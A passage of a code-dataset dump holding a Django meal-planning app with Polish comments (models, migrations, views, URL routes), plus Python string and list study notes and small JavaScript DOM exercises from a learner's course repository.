verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('slug', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='Plan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('created', models.DateField(auto_now_add=True)),\n ],\n ),\n migrations.CreateModel(\n name='Recipe',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=255)),\n ('ingredients', models.TextField()),\n ('description', models.TextField()),\n ('created', models.DateField(auto_now_add=True)),\n ('updated', 
models.DateField(auto_now=True)),\n ('preparation_time', models.IntegerField()),\n\t\t('preparation',models.TextField()),\n ('votes', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='RecipePlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('meal_name', models.CharField(max_length=255)),\n ('order', models.SmallIntegerField()),\n ('day_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.DayName')),\n ('plan', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.Plan')),\n ('recipe', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='jedzonko.Recipe')),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.7015075087547302, "alphanum_fraction": 0.7128978371620178, "avg_line_length": 39.876712799072266, "blob_id": "f7573b746dd2ef17ef2db1196ce4c030d8d730af", "content_id": "782f2dd6a57b131b3361dc8c76887450170c9556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3043, "license_type": "no_license", "max_line_length": 141, "num_lines": 73, "path": "/jedzonko/models.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\n# Create your models here.\n\n# - **recipe**: Tabela zawierająca przepisy.\n# - id: klucz główny tabeli,\n# - name: nazwa przepisu, varchar(255)\n# - ingredients: składniki przepisu, text\n# - description: treść przepisu, text\n# - created: data dodania przepisu (powinna być wypełniana automatycznie), timestamp with timezone\n# - updated: data aktualizacji przepisu (powinna być wypełniana automatycznie), timestamp with timezone\n# - preparation_time: czas przygotowania (w minutach), integer\n# - preparation: sposób przygotowania\n# - votes: liczba głosów na przepis, integer\n\nclass Recipe(models.Model):\n name = 
models.CharField(max_length=255)\n ingredients = models.TextField()\n description = models.TextField()\n created = models.DateField(auto_now_add = True)\n updated = models.DateField(auto_now = True)\n preparation_time = models.IntegerField()\n preparation = models.TextField()\n votes = models.IntegerField()\n\n# - **plan**: Tabela zawierająca informacje na temat planów.\n# - id: klucz główny tabeli,\n# - name: nazwa planu, varchar(255)\n# - description: opis planu, text\n# - created: data utworzenia. timestamp with timezone\n\nclass Plan(models.Model):\n name = models.CharField(max_length=255)\n description = models.TextField()\n created = models.DateField(auto_now_add = True)\n\n#\n# - **dayname**: Tabela zawierająca nazwy dni (podejmijcie decyzję projektową: zastanówcie się, czy nie lepiej zamienić to na enuma w Django)\n# - id: klucz główny tabeli,\n# - name: nazwa dnia, varchar(16)\n# - order: kolejność dnia, integer\n\nclass DayName(models.Model):\n name = models.CharField(max_length=16, unique=True)\n order = models.SmallIntegerField(unique=True)\n\n# - **page**: Tabela zawierająca dane strony.\n# - id: klucz główny tabeli,\n# - title: tytuł strony, varchar(255)\n# - descritption: treść strony, text\n# - slug: unikalny identyfikator tworzony na podstawie tytułu, varchar(255)\n\nclass Page(models.Model):\n title = models.CharField(max_length=255)\n description = models.TextField()\n slug = models.CharField(max_length=255)\n\n#\n# - **recipeplan**: Tabela zawierająca informacje o połączeniu przepisu oraz planu.\n# - id: klucz główny tabeli,\n# - meal_name: nazwa posiłku, varchar(255)\n# - recipe_id: klucz obcy do tabeli przepisów (w modelu nazwij to „recipe”),\n# - plan_id: klucz obcy do tabeli planów (w modelu nazwij to „plan”),\n# - order: kolejność posiłków w planie, integer\n# - day_name_id: klucz obcy z do tabeli day_name (w modelu nazwij to „day_name”)\n\nclass RecipePlan(models.Model):\n meal_name = models.CharField(max_length=255)\n order = 
models.SmallIntegerField()\n recipe = models.ForeignKey('Recipe', on_delete=models.DO_NOTHING, blank=True, null=True)\n plan = models.ForeignKey('Plan', on_delete=models.DO_NOTHING, blank=True, null=True)\n day_name = models.ForeignKey('DayName', on_delete=models.DO_NOTHING, blank=True, null=True)\n\n" }, { "alpha_fraction": 0.661963164806366, "alphanum_fraction": 0.666871190071106, "avg_line_length": 38.75609588623047, "blob_id": "c775df7446aeda6b79d4c51507b05df2fe779297", "content_id": "7ba0261529a45e8baa65ce910957bc58cf1860ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1630, "license_type": "no_license", "max_line_length": 89, "num_lines": 41, "path": "/scrumlab/urls.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "\"\"\"scrumlab URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom jedzonko.views import IndexView, About, Contact, RecipesList,PlanList,\\\n LandingPage, MainPage, AddRecipe,AddPlan, RecipeDetails, AddPlanDetails,PlanId,Main,\\\n ModifyRecipe, Login\n\n\nurlpatterns = [\n path('index/', IndexView.as_view()),\n path('about/', About.as_view()), \n path('contact/', Contact.as_view()), \n path('main/', IndexView.as_view()),\n path('recipe/list/', RecipesList.as_view()),\n path('', LandingPage.as_view()),\n path('main/', MainPage.as_view()),\n path('recipe/<int:id>/', RecipeDetails.as_view()),\n path('recipe/add/', AddRecipe.as_view()),\n path('recipe/modify/<id>/',ModifyRecipe.as_view()),\n path('plan/list/',PlanList.as_view()),\n path('plan/<int:id>/',PlanId.as_view()),\n path('plan/add/', AddPlan.as_view()),\n path('plan/add/details/', AddPlanDetails.as_view()),\n path('about/', About),\n path('contact/', Contact),\n path('login/', Login.as_view()),\n]\n" }, { "alpha_fraction": 0.6065940856933594, "alphanum_fraction": 0.6092398762702942, "avg_line_length": 32.886207580566406, "blob_id": "6e1c65039769674ee853f4e8b091eb20c92ffc5a", "content_id": "3404637c95024931f62a10b1909a91ac965ac849", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9832, "license_type": "no_license", "max_line_length": 149, "num_lines": 290, "path": "/jedzonko/views.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom django.shortcuts import render\nfrom django.views import View \nfrom django.core.paginator import Paginator\nfrom django.shortcuts import render, render_to_response,redirect,get_object_or_404\nfrom random import randint, shuffle\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom django.views import View\nfrom jedzonko.models import Recipe, Plan, DayName, RecipePlan\nfrom 
django.core.exceptions import ObjectDoesNotExist\n\n\n\nclass IndexView(View):\n def get(self, request):\n ctx = {\"actual_date\": datetime.now()}\n return render(request, \"test.html\", ctx)\n\nclass About(View):\n\n def get(self, request): \n return render(request,\"about.html\")\n\nclass Contact(View): \n\n def get(self, request):\n return render(request,\"contact.html\")\n\nclass Main(View): \n\n def get(self, request):\n return render(request,\"index.html\")\n\nclass LandingPage(View):\n def get(self, request):\n recipes_number = Recipe.objects.all().count()\n numbers = list(range(1, int(recipes_number)))\n shuffle(numbers)\n random1 = numbers.pop()\n random2 = numbers.pop()\n random3 = numbers.pop()\n\n recipes = Recipe.objects.filter(pk=random1) | Recipe.objects.filter(pk=random2) | Recipe.objects.filter(pk=random3)\n\n ctx = {\"recipes\": recipes}\n return render(request, \"index.html\", ctx)\n\n\nclass RecipesList(View):\n\n def get(self,request):\n\n recipes = Recipe.objects.order_by(\"-votes\", \"-created\")\n paginator = Paginator(recipes,3)\n\n page = request.GET.get('page')\n sorted = paginator.get_page(page)\n\n ctx = {\"recipes\": sorted}\n return render(request, 'recipes.html', ctx)\n\n\nclass MainPage(View):\n def get(self,request):\n plans_number = Plan.objects.all().count()\n recipes_number = Recipe.objects.all().count()\n\n get_plans = Plan.objects.order_by(\"created\")\n get_first_plan=get_plans[0]\n day_name= DayName.objects.all().order_by(\"order\")\n plan_recipe= RecipePlan.objects.filter(plan=get_first_plan.id).order_by(\"order\")\n\n Weekly_Plan = []\n for day in day_name:\n Daily_recipes = []\n Single_day = {}\n for item in plan_recipe:\n if item.day_name.name == day.name:\n Daily_recipes.append(item)\n\n Single_day[day.name] = Daily_recipes\n Weekly_Plan.append(Single_day)\n\n\n\n ctx = {\"plans_number\": plans_number, \"recipes_number\": recipes_number,\n \"plan_name\": get_first_plan, \"Weekly_Plan\": Weekly_Plan}\n\n return 
render(request,'dashboard.html', ctx)\n\n\nclass PlanList(View):\n\n def get(self,request):\n sorted_plans=Plan.objects.order_by(\"name\")\n paginator = Paginator(sorted_plans, 3)\n\n page = request.GET.get('page')\n sorted = paginator.get_page(page)\n\n ctx = {\"plans\": sorted}\n return render(request, 'plans.html',ctx)\n\n\nclass AddRecipe(View):\n\n def get(self,request):\n\n if \"field_bad\" in request.session:\n\n null_fields=\"wypełnij poprawnie wszystkie pola\"\n\n ctx={\"null_field\":null_fields}\n\n del request.session[\"field_bad\"]\n\n return render(request,'app-add-recipe.html',ctx)\n\n return render(request,'app-add-recipe.html')\n\n\n def post(self,request):\n recipe_name=request.POST.get(\"recipe_name\")\n recipe_description = request.POST.get(\"recipe_description\")\n preparation_time = request.POST.get(\"preparation_time\")\n recipe_preparation = request.POST.get(\"recipe_preparation\")\n recipe_ingredients = request.POST.get(\"recipe_ingredients\")\n\n if (recipe_name and recipe_description and preparation_time and\n recipe_preparation and recipe_ingredients) is not \"\":\n\n new_recipe=Recipe.objects.create(name=recipe_name,description=recipe_description,\n preparation_time=preparation_time,preparation=recipe_preparation,ingredients=recipe_ingredients,votes=0)\n\n return redirect(\"/recipe/list\")\n\n request.session[\"field_bad\"]=True\n return redirect(\"/recipe/add\")\n\nclass PlanId(View):\n\n def get(self,request,id):\n plan_details = Plan.objects.get(pk=id)\n plan_recipe = RecipePlan.objects.filter(plan=id).order_by(\"order\")\n days = DayName.objects.all().order_by(\"order\")\n\n Weekly_Plan = []\n\n for day in days:\n\n Daily_recipes = []\n Single_day = {}\n\n for item in plan_recipe:\n\n if item.day_name.name == day.name:\n Daily_recipes.append(item)\n\n Single_day[day.name] = Daily_recipes\n Weekly_Plan.append(Single_day)\n\n ctx = {\"plan_name\": plan_details, \"Weekly_Plan\": Weekly_Plan,\"plan_recipe\":plan_recipe}\n\n\n return 
render(request,\"app-details-schedules.html\",ctx)\n\nclass AddPlan(View):\n\n def get(self,request):\n\n if \"field_bad\" in request.session:\n null_fields=\"wypełnij poprawnie wszystkie pola\"\n ctx={\"null_field\":null_fields}\n del request.session[\"field_bad\"]\n return render(request,'app-add-schedules.html',ctx)\n return render(request,'app-add-schedules.html')\n\n\n def post(self,request):\n plan_name=request.POST.get(\"planName\")\n plan_description = request.POST.get(\"planDescription\")\n if (plan_name and plan_description) is not \"\":\n new_plan=Plan.objects.create(name=plan_name,description=plan_description)\n request.session[\"plan_id\"]=new_plan.pk\n return redirect(\"/plan/add/details\")\n\n request.session[\"field_bad\"]=True\n return redirect(\"/plan/add\")\n\n\nclass RecipeDetails(View):\n def get(self,request, id):\n\n recipeID_valid = False\n\n try:\n recipe = Recipe.objects.get(pk=id)\n recipeID_valid = True\n ingredients_arr = []\n recipe_ingr = recipe.ingredients.split(\", \")\n for ingr in recipe_ingr:\n ingredients_arr.append(ingr)\n\n ctx = {\"recipe\": recipe, \"ingredients_arr\": ingredients_arr, \"recipeIsValid\": recipeID_valid}\n\n except ObjectDoesNotExist as e:\n recipeID_valid = False\n error = \"Brak przepisu dla ID: {}\".format(id)\n ctx = { \"recipeIsValid\": recipeID_valid, \"error\" : error }\n\n return render(request, 'app-recipe-details.html', ctx)\n\n def post(self, request, id):\n\n try:\n recipe = Recipe.objects.get(pk=id)\n like=request.POST.get(\"like\")\n dislike=request.POST.get(\"dislike\")\n if like is not None:\n recipe.votes += 1\n elif dislike is not None:\n recipe.votes -= 1\n recipe.save()\n return redirect(\"/recipe/{}\".format(id))\n except Exception as e:\n recipeID_valid = False\n error = \"Błąd!!! 
{}\".format(id)\n ctx = { \"recipeIsValid\": recipeID_valid, \"error\" : error }\n return render(request,'app-recipe-details.html',ctx)\n\nclass AddPlanDetails(View):\n\n def get(self,request):\n if \"plan_id\" in request.session:\n plan_id= request.session['plan_id']\n plan_name=Plan.objects.all()\n recipe_name = Recipe.objects.all()\n day_name=DayName.objects.all()\n\n ctx= {\"plan_id\": plan_id,\"plan_name\" : plan_name, \"recipe_name\" : recipe_name, \"day_name\" : day_name}\n return render(request, \"app-schedules-meal-recipe.html\",ctx)\n\n return HttpResponseForbidden(\"Error403-Access to this resource on the derver is denied!\")\n\n def post(self,request):\n if \"plan_id\" in request.session:\n plan_id= request.session['plan_id']\n plan_name=Plan.objects.all()\n recipe_name = Recipe.objects.all()\n day_name=DayName.objects.all()\n\n ctx= {\"plan_id\": plan_id,\"plan_name\" : plan_name, \"recipe_name\" : recipe_name, \"day_name\" : day_name}\n return render(request, \"app-schedules-meal-recipe.html\",ctx)\n return HttpResponseForbidden(\"Error403-Access to this resource on the server is denied!\")\n \nclass ModifyRecipe(View):\n def get(self, request,id):\n recipe=get_object_or_404(Recipe,id=id)\n ctx={\"recipe\" : recipe}\n if \"field_bad\" in request.session:\n null_fields = \"Wypełnij poprawnie wszystkie pola\"\n ctx = {\"null_field\": null_fields}\n del request.session[\"field_bad\"]\n return render(request, 'app-edit-recipe.html', ctx)\n return render(request, 'app-edit-recipe.html',ctx)\n\n def post(self, request,id):\n recipe_name = request.POST.get(\"recipe_name\")\n recipe_ingredients = request.POST.get(\"recipe_ingredients\")\n recipe_description = request.POST.get(\"recipe_description\")\n preparation_time = request.POST.get(\"preparation_time\")\n recipe_preparation = request.POST.get(\"recipe_preparation\")\n\n if (recipe_name and recipe_ingredients and recipe_description and preparation_time and\n recipe_preparation) is not \"\":\n 
modify_recipe = Recipe.objects.create(name=recipe_name, ingredients=recipe_ingredients,\n description=recipe_description,\n preparation_time=preparation_time, preparation=recipe_preparation,\n votes=0)\n return redirect(\"/recipe/list\")\n\n request.session[\"field_bad\"] = True\n return redirect(\"/recipe/modify/{}\".format(id))\n\n\nclass Login(View):\n def get(self,request):\n return render(request,\"login.html\")\n\n # def post(self,request):\n" }, { "alpha_fraction": 0.6483363509178162, "alphanum_fraction": 0.6698545813560486, "avg_line_length": 31.80392074584961, "blob_id": "f5a18959b22abfa10c03afd033ada26067098512", "content_id": "6d87a2d87d9aa25c6017a8969207726bfb4d15dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5070, "license_type": "no_license", "max_line_length": 137, "num_lines": 153, "path": "/jedzonko/migrations/0002_auto_20190507_1955.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2019-05-07 17:55\n\nfrom django.db import migrations\n\ndef add_DayNames(apps, schema_editor):\n # We can't import the Person model directly as it may be a newer\n # version than this migration expects. We use the historical version.\n DayName = apps.get_model('jedzonko', 'DayName')\n\n Days = {\n \"Monady\" : 8,\n \"Thusday\" : 9,\n \"Wensday\" : 10,\n \"Thursday\" : 11,\n \"Friday\": 12,\n \"Saturday\": 13,\n \"Sunday\" : 14\n }\n for key, value in Days.items():\n DayName.objects.create(name=key, order=value)\n\ndef add_Plans(apps, schema_editor):\n\n Plan = apps.get_model('jedzonko', 'Plan')\n\n Norway = {\n \"name\" : \"Dieta Norweska\",\n \"description\" : \"\"\"Opracowana przez lekarzy i specjalistów żywienia w Oslo.\n Zakłada restrykcyjną dietę trwającą 14 dni. 
Podstawą diety norweskiej są jajka i grejpfruty - muszą być w codziennym jadłospisie.\n Poza tym można jeść wybrane owoce i warzywa oraz gotowane mięso.\n W dwa tygodnie można schudnąć 10 kilogramów\"\"\"\n }\n\n Plan.objects.create(name=Norway[\"name\"], description=Norway[\"description\"])\n\n Espaniol = {\n \"name\" : \"Dieta hiszpańska\",\n \"description\" : \"\"\"Polega na obniżeniu spożycia kalorii - dziennie do 1000-1500 kcal.\n Oparta jest na owcach i warzywach. Zakłada zrzucenie 3-6 kilogramów w ciągu dwóch tygodni diety\"\"\"\n }\n\n Plan.objects.create(name=Espaniol[\"name\"], description=Espaniol[\"description\"])\n\ndef add_Recipes(apps, schema_editor):\n\n Recipe = apps.get_model('jedzonko','Recipe')\n\n Recipe.objects.create(\n name=\"Śnidanie po Norwesku\",\n ingredients=\"3 jajka, kawa\",\n description=\"Gotowane jajka z kawą bez mleka i cukru\",\n preparation_time=5,\n\tpreparation=\"gotuj jajka 2 minuty\",\n votes=2)\n\n Recipe.objects.create(\n name=\"Norweski obiad\",\n ingredients=\"2 jajka, porcja szpinaku, jogurt\",\n description=\"Jajka ze szpinakiem z dodatkiem jogurtu naturalnego\",\n preparation_time=15,\n\tpreparation=\"zagotuj jajka, dodaj porcję szpinaku i jogurtu wedle uznania\",\n votes=20)\n\n Recipe.objects.create(\n name=\"Hiszpańskie śniadanie\",\n ingredients=\"kawa bez cukru, 2 kromki pieczywa chrupkiego, 2 plasterki polędwicy drobiowej, jogurt beztłuszczowy naturalny\",\n description=\"Pieczywo chrupkie z polędwicą\",\n preparation_time=5,\n\tpreparation=\"zrób kanapki z przygotowanych składników\",\n votes=25)\n\n Recipe.objects.create(\n name=\"Obiad po Hiszpańsku\",\n ingredients=\"300 g warzyw z patelni (smażonych na oliwie z oliwek), jogurt naturalny\",\n description=\"Smażone warzywa\",\n preparation_time=20,\n\tpreparation=\"Smaż warzywa na patelni i dolej do nich jogurt naturalny\",\n votes=35)\n\n Recipe.objects.create(\n name=\"Hiszpańska Kolacja\",\n ingredients=\"sałatka pomidorowa polana sosem winegret, 2 
plasterki szynki z indyka, pieczone jabłko\",\n description=\"Sałatka pomidorowa\",\n preparation_time=20,\n\tpreparation=\"Wszystkie składniki wrzuć do jednego naczynia i smacznego\",\n votes=60)\n\n# class RecipePlan(models.Model):\n# meal_name = models.CharField(max_length=255)\n# order = models.SmallIntegerField(unique=True)\n# recipe = models.ForeignKey('Recipe', on_delete=models.DO_NOTHING)\n# plan = models.ForeignKey('Plan', on_delete=models.DO_NOTHING)\n# day_name = models.ForeignKey('DayName', on_delete=models.DO_NOTHING)\n\ndef add_RecipePlans(apps, schema_editor):\n\n Recipe = apps.get_model('jedzonko','Recipe')\n DayName = apps.get_model('jedzonko', 'DayName')\n Plan = apps.get_model('jedzonko', 'Plan')\n RecipePlan = apps.get_model('jedzonko', 'RecipePlan')\n\n r1_1 = RecipePlan.objects.create(\n meal_name=\"r1 sniadanie\",\n order=1,\n plan = Plan.objects.get(pk=1),\n recipe = Recipe.objects.get(pk=1), #Śnidanie po Norwesku\n day_name = DayName.objects.get(pk=1)\n )\n\n r1_2 = RecipePlan.objects.create(\n meal_name=\"r1 obiad\",\n order=2,\n plan = Plan.objects.get(pk=1),\n recipe = Recipe.objects.get(pk=2), #Norweski obiad\n day_name = DayName.objects.get(pk=1),\n )\n\n r2_1 = RecipePlan.objects.create(\n meal_name=\"r2 śniadanie\",\n order=1,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=3), #Hiszpańskie śniadanie\n day_name = DayName.objects.get(pk=2),\n )\n\n r2_2 = RecipePlan.objects.create(\n meal_name=\"r2 obiad\",\n order=2,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=4), #Obiad po Hiszpańsku\n day_name = DayName.objects.get(pk=2)\n )\n\n r2_3 = RecipePlan.objects.create(\n meal_name=\"r2 kolacja\",\n order=3,\n plan = Plan.objects.get(pk=2),\n recipe = Recipe.objects.get(pk=5), #Hiszpańska Kolacja\n day_name = DayName.objects.get(pk=2)\n )\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jedzonko', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(add_DayNames),\n 
migrations.RunPython(add_Plans),\n migrations.RunPython(add_Recipes),\n migrations.RunPython(add_RecipePlans),\n ]\n" } ]
5
xiam220/UdemyCourses
https://github.com/xiam220/UdemyCourses
824afe0a5bcc3b1e8affb848e3852dbb935b693e
2b81537423e2059ec5a990648ba54e8a4a1094bc
c44456f557d087b3c2879547f336e076ffeb73a9
refs/heads/main
2023-01-09T07:43:02.667330
2020-11-10T04:25:13
2020-11-10T04:25:13
311,533,458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5648854970932007, "alphanum_fraction": 0.5708227157592773, "avg_line_length": 23.5625, "blob_id": "411ff775b0b10a5d9f4855ec7febf9180da27611", "content_id": "00accf820ee3301ef92233f86431329f85dde7b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1179, "license_type": "no_license", "max_line_length": 88, "num_lines": 48, "path": "/Python/StringMethods.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "String Functions\n greet = 'hellloooo'\n\n print(len(greet)) \n #Output: 9\n\n print(greet[0:len(greet)])\n #Output: hellloooo\n\nFormatted Strings\n name = 'Johnny'\n age = 55\n \n print(f'Hi {name}. You are {age} years old.')\n #Output: Hi Johnny. You are 55 years old. \n \n \"\"\"\n Alternative:\n print('Hi ' + name + '. You are ' + str(age) + ' years old.')\n \"\"\"\n \nString Methods\n quote = 'to be or not to be'\n\n #str.upper() #Modifies entire str to uppercase\n print(quote.upper())\n #Output: TO BE OR NOT TO BE\n\n #str.capitalize() #Capitalizes first character in str\n print(quote.capitalize()) \n #Output: To be or not to be\n\n #str.find('x') #Returns position of x if it exists\n print(quote.find('be'))\n #Output: 3\n\n #str.replace(old, new) #Replace all occurrences of old with new\n print(quote.replace('be', 'me'))\n #Output: to me or not to me\n\n print(quote)\n #Output: to be or not to be\n \n \"\"\"\n When we use methods, we are creating a new String\n We never modify the original String\n We are not assigning it to anything\n \"\"\"\n" }, { "alpha_fraction": 0.4277777671813965, "alphanum_fraction": 0.47469136118888855, "avg_line_length": 23.545454025268555, "blob_id": "4d4603046ee1f8466475d0ec3128397ccbbd8d2d", "content_id": "1efafed3d2000df6a660db1053f90d12c44f2cd8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1620, "license_type": "no_license", "max_line_length": 102, "num_lines": 
66, "path": "/Python/ListMethods.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "ListMethods1\n basket = [1, 2, 3, 4, 5]\n len(basket)\n #returns 5\n\n #Appending to list\n basket.append(100)\n #returns [1, 2, 3, 4, 5, 100]\n \n #Inserting to list\n basket.insert(4, 100)\n #returns [1, 2, 3, 4, 100, 5]\n \n #Extending list\n basket.extend([100, 101]) #Takes an iterable [that you can loop over]\n #returns [1, 2, 3, 4, 5, 100, 101] #Modifies the list in place and extends our list\n \n #basket.pop(i) #Removes element at position i\n basket.pop() #Removes last element in list \n #returns [1, 2, 3, 4, 5]\n \n basket.pop(0) \n #returns [2, 3, 4, 5]\n \n #basket.remove()\n basket.remove(4) #Pass value we want to remove\n #returns [2, 3, 5]\n \n \"\"\"\n .pop() returns whatever you just removed\n basket = [1, 2, 3, 4, 5]\n new_list = basket.pop(4)\n print(new_list)\n #Output: 5\n \"\"\"\n \n #Clear\n basket.clear()\n #returns []\n\nListMethods2\n basket = ['a', 'b', 'c', 'd', 'e']\n basket.index('d')\n #returns 3\n \n basket.index('d', 0, 3)\n \"\"\"\n Console:\n Traceback (most recent call last):\n ...\n ValueError: 'd' is not in list\n \"\"\"\n basket.index('d', 0, 4)\n #returns 3\n \n print('d' in basket)\n #Output: True\n \n print('i' in 'hi my name is Ian')\n #Output: True\n \n basket = ['a', 'b', 'c', 'd', 'e', 'd']\n \n #.count() #Count how many times an item occurs\n basket.count('d') \n #returns 2\n" }, { "alpha_fraction": 0.5035211443901062, "alphanum_fraction": 0.5704225301742554, "avg_line_length": 27.979591369628906, "blob_id": "10b1dedf3a9ad1048eb0a37039cacc26cf5effc0", "content_id": "ff0a0b5a61b199cbbfeba03a958421c25c255600", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1420, "license_type": "no_license", "max_line_length": 110, "num_lines": 49, "path": "/Python/StringIndexing.py", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "numbers = 
'01234567'\n \n print(numbers[0]) #return 0th index\n #Output: 0\n \n #numbers[0:i] #return 0th to ith index (not including ith position)\n print(numbers[0:2]) \n #Output: 01\n \n #numbers[start:stop:stepover] #return elements from start to stop, stepping over ever stepover\n print(numbers[0:8:2]) #return elements from 0 to 8, stepping over every 2nd\n #Output: 0246\n \n print(numbers[1:]) #start at 1 and print all the way to the end\n #Output: 1234567\n \n print(numbers[:5]) #start at 0 and stops at 5\n #Output: 01234\n \n print(numbers[::1]) #start at 0, stop at 8, step over by 1\n #Output: 01234567\n \n print(numbers[-1]) #start at the end\n #Output: 7\n print(numbers[-2])\n #Output: 6\n print(numbers[::-1])\n #Output: 76543210\n \n\"\"\"\nString are immutable, meaning they cannot be changed \nFor example, \n numbers = '01234567'\nYou can modify the variable type:\n numbers = 100\n print(numbers)\n #Output: 100 \nHowever, you can't change the String itself:\n numbers[0] = '8'\n print(numbers)\n #Output:\n Traceback (most recent call last):\n ...\n >\nThe only way to modify the String is to change the variable completely:\n numbers = '81234567'\n print(numbers[0])\n #Output: 8\n\"\"\"\n" }, { "alpha_fraction": 0.45126834511756897, "alphanum_fraction": 0.46595460176467896, "avg_line_length": 13.645833015441895, "blob_id": "d88e8f12a80d833ec35fae23ec79cb4a3b0b5a03", "content_id": "e150b0f6211b74673b968ecfc5a2737afc52ab87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 749, "license_type": "no_license", "max_line_length": 43, "num_lines": 48, "path": "/WebDevelopment/Javascript/WebpageJavascript/script.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "// function sayHello(){\r\n// console.log(\"Hello\");\r\n// }\r\n\r\n// sayHello();\r\n\r\n// var sayBye = function(){\r\n// console.log(\"Bye\");\r\n// }\r\n\r\n// sayBye();\r\n\r\n// function sing(song){\r\n// 
console.log(song);\r\n// }\r\n\r\n// sing(\"Laaa deee daa\");\r\n\r\n// function multiply(a, b){\r\n// return a * b;\r\n// }\r\n\r\n// multiply(5, 10);\r\n\r\n//parameters are a and b\r\n//arguments are 5, 10\r\n\r\nvar user = {\r\n name: \"John\",\r\n age: 34,\r\n hobby: \"Soccer\",\r\n isMarried: false,\r\n spells: [\"abrakadra\", \"shazam\", \"boo\"],\r\n shout: function(){\r\n console.log(\"AHHHHHHHH!\");\r\n }\r\n};\r\n\r\nvar list = [\r\n {\r\n username: \"andy\",\r\n password: \"secret\"\r\n },\r\n {\r\n username: \"jess\",\r\n password: \"123\"\r\n }\r\n]" }, { "alpha_fraction": 0.680341899394989, "alphanum_fraction": 0.6846153736114502, "avg_line_length": 27.299999237060547, "blob_id": "ce5408ee3eb2c12886af9f5ffb67d2c183513810", "content_id": "7d68acb7b89746a07adbfef888d216d53664ba7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 71, "num_lines": 40, "path": "/WebDevelopment/DOM-Manipulation/DOM-selectors/script.js", "repo_name": "xiam220/UdemyCourses", "src_encoding": "UTF-8", "text": "// var button = document.getElementsByTagName(\"button\")[0];\r\n// //button is an array\r\n// button.addEventListener(\"click\", function(){\r\n// console.log(\"CLICK!!!!\");\r\n// })\r\n\r\nvar button = document.getElementById(\"enter\");\r\nvar input = document.getElementById(\"userInput\");\r\nvar ul = document.querySelector(\"ul\");\r\n\r\nfunction inputLength(){\r\n return input.value.length;\r\n}\r\n\r\nfunction createListElement(){\r\n var li = document.createElement(\"li\");\r\n li.appendChild(document.createTextNode(input.value));\r\n ul.appendChild(li);\r\n input.value = \"\";\r\n}\r\n\r\nfunction addListAfterClick(){\r\n if(inputLength() > 0){\r\n createListElement();\r\n }\r\n}\r\n\r\nfunction addListAfterKeypress(event){\r\n if(inputLength() > 0 && event.keyCode === 13){\r\n createListElement();\r\n }\r\n}\r\n\r\n//Callback Functions: When 
